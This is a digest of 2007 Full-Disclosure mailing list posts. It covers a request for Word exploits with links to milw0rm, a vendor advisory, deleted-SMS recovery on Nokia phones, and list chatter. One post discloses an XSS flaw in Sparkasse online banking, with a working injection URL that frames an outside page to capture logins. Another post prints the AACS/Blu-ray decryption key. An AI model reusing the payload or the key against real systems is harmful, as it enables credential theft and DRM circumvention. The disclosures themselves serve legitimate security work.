Re: [Full-disclosure] Windows POC

[h4h]

On 5/16/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:


 >>I was wondering if anyone has a few Microsoft Windows Word proof of
concept exploits for a demo?
Go to http://www.milw0rm.com and search on Word

http://www.milw0rm.com/exploits/3260 for example

 Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.eweek.com/cheap_hack/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]



WHO IS YOUR DADDY AND WHAT DOES HE DO?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] XSS vulnerability on various german online banking sites (sparkasse)

[Ulrich Keil]

The "Sparkassen-Finanzgruppe" with a transaction volume of over 3.300 
billion euro is one of the largest banks for private customers in 
germany. Many local member-banks of the group use the online banking 
portal provided by sfze (http://www.sfze.de/), a subsidiary company of 
Sparkassen-Finanzgruppe.

Vulnerability:
The online banking software of sfze does not check the HTTP GET 
Parameter "KONTO" on the login page, and displays the content of this 
variable without modification within the html form area.

Impact:
An attacker may gather login data (ID+PIN) from customers of the 
Sparkassen-Finanzgruppe by tricking them to click on a special crafted 
link, which points to the original login page of the online banking system.

Demonstration:
The following trivial example demonstrates the impact of this 
vulnerability by extending the login form with an iframe:
https://bankingportal.sparkasse-donnersberg.de/banking/?BLZ=54051990&Bankingaufruf.x=0&Bankingaufruf.y=0&KONTO=%22%20/%3E%3Ciframe%20src=%22http://www.derkeiler.com/uk/sp.html%22%20scrolling=%22no%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22width=%22310px%22

Some subsidiary companies of Sparkassen-Finanzgruppe which are affected 
by this vulerability:
-Sparkasse Donnersberg
-Sparkasse Ludwigshafen
-Sparkasse KölnBonn
-Sparkasse Aachen
-Frankfurter Sparkasse
-Sparkasse Rhein Neckar Nord

Ulrich Keil
-- 
http://www.derkeiler.com
PGP Fingerprint: 5FA4 4C01 8D92 A906 E831  CAF1 3F51 8F47 1233 9AAD
Public key available at http://www.derkeiler.com/uk/pgp-key.asc

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] A Story about my Childhood: Destionation Whitehat

[Open Phugu]

On 5/16/07, Ross Brown <[EMAIL PROTECTED]> wrote:
> Aliso Viejo, CA - This is a story about my childhood, my sister and
removed load of crap
> With love, Ross Brown, 42 year resident of Aliso Viejo, California, ex-eEye 
> CEO.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

Wow. Please, can someone explain to me what the hell this has to do
with computer security?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Blu-Ray key - Oh Nine, Efe Nine

[M . B . Jr .]

well,
since no one mentioned yet...

here is the hex sequence 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88
C0, already famous key for breaking HD-DVDs' Advanced Access Content
System and Blu-Ray as well, thanx to Doom9 team.

no more workarounds...

whats DMCA again...?


-- 
Marcio Barbado, Jr.
==
==

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows POC

[James Matthews]

Yes that does suck!

On 5/16/07, str0ke <[EMAIL PROTECTED]> wrote:


On 5/16/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:
>
>
>  >> http://www.milw0 ..  for example
>
> A word of advice to everyone: Don't send milw0rm links out to the list
> unless you want to drown in blowback from Antigen gateways.

Wow that sucks :)

/str0ke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA BrightStor ARCserve Backup Mediasvr.exe and caloggerd.exe Vulnerabilities

[Williams, James K]

Title: CA BrightStor ARCserve Backup Mediasvr.exe and 
caloggerd.exe Vulnerabilities

Notice Date: 2007-05-16

CA is aware that two functional exploit code samples were 
publicized on May 16, 2007. These two denial of service exploits 
are associated with vulnerabilities in CA BrightStor ARCserve 
Backup Mediasvr.exe and caloggerd.exe.

We have verified that vulnerabilities do exist, and we are now 
working on a patch to address the issues. We have given these 
vulnerabilities a Medium risk rating.

To mitigate the Mediasvr.exe vulnerability, CA recommends that 
BrightStor ARCserve Backup users implement the following temporary 
workaround:

   1. Rename the "mediasvr.exe" file to a non-functional file 
  name, such as "mediasvc.exe.disable".

   2. Then restart the CA BrightStor Tape Engine service.

This will disable the command line functionality in the product 
(i.e. command line utilities such as ca_backup, ca_restore, 
ca_merge, ca_qmgr, ca_scan, etc will not work).

After we have completed our analysis of these issues, we will post 
an update and patches on the CA SupportConnect website. If 
additional information is required, please contact CA Technical 
Support at http://supportconnect.ca.com.

If you discover a vulnerability in CA products, please report your 
findings to vuln AT ca DOT com, or utilize our "Submit a 
Vulnerability" form at 
http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx


Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2007 CA. All rights reserved.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60)

[Davide Del Vecchio]

3APA3A ha scritto:
> Dear Davide Del Vecchio,
> 
>  It's also possible to recover deleted photos from almost any flash card
>  in almost any device (camera, mobile, etc) - it's a way general purpose
>  file  systems  work.  Requirement  to  delete  information  securely is
>  enforced  in devices certified to e.g. process US military secretes. In
>  this case, device must follow DoD 5220-22-M recommendations and you can
>  expect  secure erase. In general purpose operation systems and devices,
>  todelete   information   securely   (wipe   it)   some   additional
>  actions/utilities are usually required.
> 
> --Tuesday, May 15, 2007, 9:09:19 PM, you wrote to 
> full-disclosure@lists.grok.org.uk:
> 
> DDV> Hello list,
> 
> DDV> During some research, I found an intersting "feature"
> DDV> on my Nokia mobile phone; I was able to retrieve any
> DDV> apparently deleted sms/mms.

I completely agree with you.
Infact the news is how EASY is it to recover sms/mms deleted without
using any recovery tool (just using the PC Nokia Suite) and the aim of
my post was to increase the perception of the privacy risk on the mobile
devices.

I hope that after this post, Nokia people will think about introducing
more security features. Those actually are infact often reduced to just
a 4 digit number (the PIN).

I think the question is crucial and, I hope, finally clear.

d.

-- 
http://www.alighieri.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60)

[Michael Holstein]

and what's more .. Flash memory not being infinitely over-writable, file 
systems used on those devices (JFFS2 for example) actually encourage 
leaving data behind by ensuring recently unlinked logical blocks aren't 
re-used anytime soon (wear-leveling).

I know the original method proposed is non-destructive, but using a test 
clip it's possible to dump the contents of just about any flash device. 
Furthermore, given a significantly motivated adversary (and barring all 
but physical destruction of the chip die itself -- not just the package) 
one could also read the contents with a microscope -- even after several 
erasures(*).

(*) link : http://www.cl.cam.ac.uk/~sps32/DataRem_CHES2005.pdf

But if all you're trying to do is retrieve SMS messages, it'd be a lot 
easier to just subpoena the carrier .. they keep the contents forever 
(even if they say they don't .. I know for a fact they do because I 
personally saw one of the major US carriers .. [ahem.. Verizon] .. 
deliver boxes of sent/received text messages -- for hundreds of phones 
-- going back at least a year).

Cheers,

Michael Holstein CISSP GCIA
Cleveland State University

>  It's also possible to recover deleted photos from almost any flash card
>  in almost any device (camera, mobile, etc) - it's a way general purpose
>  file  systems  work.  Requirement  to  delete  information  securely is
>  enforced  in devices certified to e.g. process US military secretes. In
>  this case, device must follow DoD 5220-22-M recommendations and you can
>  expect  secure erase. In general purpose operation systems and devices,
>  todelete   information   securely   (wipe   it)   some   additional
>  actions/utilities are usually required.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60)

[3APA3A]

Dear Davide Del Vecchio,

 It's also possible to recover deleted photos from almost any flash card
 in almost any device (camera, mobile, etc) - it's a way general purpose
 file  systems  work.  Requirement  to  delete  information  securely is
 enforced  in devices certified to e.g. process US military secretes. In
 this case, device must follow DoD 5220-22-M recommendations and you can
 expect  secure erase. In general purpose operation systems and devices,
 todelete   information   securely   (wipe   it)   some   additional
 actions/utilities are usually required.

--Tuesday, May 15, 2007, 9:09:19 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

DDV> Hello list,

DDV> During some research, I found an intersting "feature"
DDV> on my Nokia mobile phone; I was able to retrieve any
DDV> apparently deleted sms/mms.


-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

[wafa louis]

Hello Please do not send me more masseg  please write Emily Write do not 
wish to jointly Thank you

_
Student och ressugen – här finns bästa priserna 
http://www.ticket.se/sv/student/studentflyg.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60)

[Robert McArdle]

I downloaded the latest Version of Nokia PC Suite from the Nokia site (6.8.3Rel
14.1). I then sent a message to myself and deleted it after it arrived.
Backing up my phone created a single .ndu file (not multiple dats). I
analyzed the strings in the file (file uses no compression/packing) and
although I can see all my other Messages/Contacts - the test message was not
present.

The test was carried out on a Nokia N73 running Symbian 9.X

Robert McArdle
--
www.RobertMcArdle.com/blog/ - Techie/Security/Inane Ramblings

On 5/15/07, Davide Del Vecchio <[EMAIL PROTECTED]> wrote:


Hello list,

During some research, I found an intersting "feature"
on my Nokia mobile phone; I was able to retrieve any
apparently deleted sms/mms.
Letting aside some paranoid thoughts about WHY this
sms are not deleted, I think that, while this represents
an high risk for our privacy, this discover could give some
hint into mobile phone forensics and anti-forensics field.

First, I would like to tell you that I tested this on
my Nokia N-gage and on a Nokia 6600 but I am quiete sure
that this procedure works on every Nokia Symbian S60
(maybe other vendors). So I strongly incite you to test
it on your mobile phone and share the results.


Tested products:

Nokia N-gage, firmware version: V 4.03 26-11-2003 NEM-4

Nokia 6600

Maybe the whole S60 series.


Procedure:

Download the Nokia PC Suite for your mobile phone and make
a backup on your local hd.
I used PC Suite for Nokia N-Gage Version 1.0.0
http://www.nokia.com/pcsuite

It will create a huge number of ".dat" files in a specified
directory.

Download, install and start Cygwin. This is not required but
suggested, you could use an hexadecimal editor and a bit of
patience but using Cygwin is surely faster.
http://www.cygwin.com


Move into the backup directory.


$ ls -al | less

total 6016
drwx--+ 2 Administrator Nessuno  0 Feb  6 01:35 .
drwx--+ 7 Administrator Nessuno  0 Feb  5 23:00 ..
-rwx--+ 1 Administrator Nessuno   2972 Nov 27  2003 1.dat
-rwx--+ 1 Administrator Nessuno  22913 Nov 27  2003 10.dat
-rwx--+ 1 Administrator Nessuno   1062 Feb 16  2005 100.dat
-rwx--+ 1 Administrator Nessuno   3912 Aug  9  2005 1000.dat
-rwx--+ 1 Administrator Nessuno   2750 Aug 25  2005 1001.dat
-rwx--+ 1 Administrator Nessuno   8741 Dec 15  2005 1002.dat
-rwx--+ 1 Administrator Nessuno   9926 Dec 20  2005 1003.dat
-rwx--+ 1 Administrator Nessuno 63 Dec 30  2005 1004.dat
-rwx--+ 1 Administrator Nessuno  23988 Jan 13  2006 1005.dat
-rwx--+ 1 Administrator Nessuno 18 Jan 23  2006 1006.dat
...
...
etc etc (files created by the nokia pc suite).


Choose a file to examine.

$ ls -al 3102.dat
-rwx--+ 1 Administrator Nessuno 666569 Feb  5 23:59 3102.dat

Use the command "strings" to find printable characters.

$ strings 3102.dat | less

Ciao! Auguro a te ed alla tua [EMAIL PROTECTED] Farlonesi
...
...
etc etc



This is part of an sms I deleted and that I don't see on my phone.
So, just grep every file in the directory to find the complete sms:

$ grep -i "Auguro a te ed alla" *

Binary file 1770.dat matches
Binary file 3102.dat matches

The sms has been found in 1770.dat file, let's see what's inside it:

$ strings 1770.dat

Ciao! Auguro a te ed alla tua famiglia un felice anno nuovo! E.
4+393915253350
4+393922378986

Got it! The complete sms, with the phone number of the sender (phone
numbers have been changed).
In earlier versions of Nokia PC Suite it just creates a ".nbu" file and
you can just edit it with an hexadecimal editor.

I mailed the Nokia support and they told me they didn't know about this
bug and would like to know more informations about impacted models but
they don't have any intention to release some kind of patch.
I contacted Symbian too, they told me that Symbian sources are
distributed to mobile phone vendors and so they cannot release any
final-user patch.

This description is also avaiable here:
http://www.alighieri.org/advisories/retrieving_deleted_sms.txt (ENG)
http://www.alighieri.org/advisories/recuperare_sms_cancellati.txt (ITA)

Regards,

Davide Del Vecchio.

--
http://www.alighieri.org





--
www.RobertMcArdle.com/blog/ - Techie/Security/Inane Ramblings
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Month of [something] Bugs

[Kristian Hermansen]

On 5/16/07, "Guasconi Vincent" <[EMAIL PROTECTED]> wrote:
> I got an email from Mustlive about a new project he is starting up next month.
> In June, he's kicking off the Month of Search Engine Bugs.
> "
> http://websecurity.com.ua/category/moseb/

You really think people are going to expose their Gmail 0-days?
Heh...good luck :-)
-- 
Kristian Hermansen

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows POC

[str0ke]

On 5/16/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:
>
>
>  >> http://www.milw0 ..  for example
>
> A word of advice to everyone: Don't send milw0rm links out to the list
> unless you want to drown in blowback from Antigen gateways.

Wow that sucks :)

/str0ke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] About the Post: Exciting new Paimei release!

[Jared DeMott]

This message concerns the below post.  In case it isn't obvious, this
isn't the real Pedram.  We're not sure
who or why.

Blessings,
Jared

>I am excited to see Jared DeMott's recent post to Dailydave with his
>release
>of the Evolutionary Fuzzing System! A highly exciting and revolutionary
>(or is it EVOLUTIONARY!?) new fuzzing system designed for automatic
>discovery of
>protocols. A much exciting concept that I will have to write about in
>my new book!
>Also included in this release is code previously only private to my
>copy of Paimei! Previously, all remote debugging functionality was
reserved for my
>private copy but apparently Jared DeMott felt the time was right to
>include pydbg_client class in his EFS release of Paimei! This should allow
>debuggers of applications to use the remote functionality of Paimei to
debug
>processes running on remote computers. Also the all new pydbg_server,
just in this
>release! These tools should help all of you most greatly. I highly
>recommend that instead of downloading the latest release of Paimei from
openrce.org,
>you download the efs-paimei package from appliedsec.com, as their package
>has been updated far in advance of mine.
>Happy fuzzing, and let the best boundary character overflow!
>Pedram L. AminiAAA
>"But I return to my previous stack frame from there!"
>"NOT TONIGHT YOU DON'T"
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows POC

[Larry Seltzer]

 >> http://www.milw0 ..    for
example 
 
A word of advice to everyone: Don't send milw0rm links out to the list
unless you want to drown in blowback from Antigen gateways. 
 
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/ http://security.eweek.com/> 
http://blogs.eweek.com/cheap_hack/

 
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows POC

[Larry Seltzer]

>>I was wondering if anyone has a few Microsoft Windows Word proof of
concept exploits for a demo?

Go to http://www.milw0rm.com and search on Word
 
http://www.milw0rm.com/exploits/3260
http://www.milw0rm.com/exploits/3260>  for example
 
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/ http://security.eweek.com/> 
http://blogs.eweek.com/cheap_hack/

 
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Windows POC

[Stack Smasher]

I was wondering if anyone has a few Microsoft Windows Word proof of concept
exploits for a demo?



Thank You

--
"If you see me laughing, you better have backups"
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/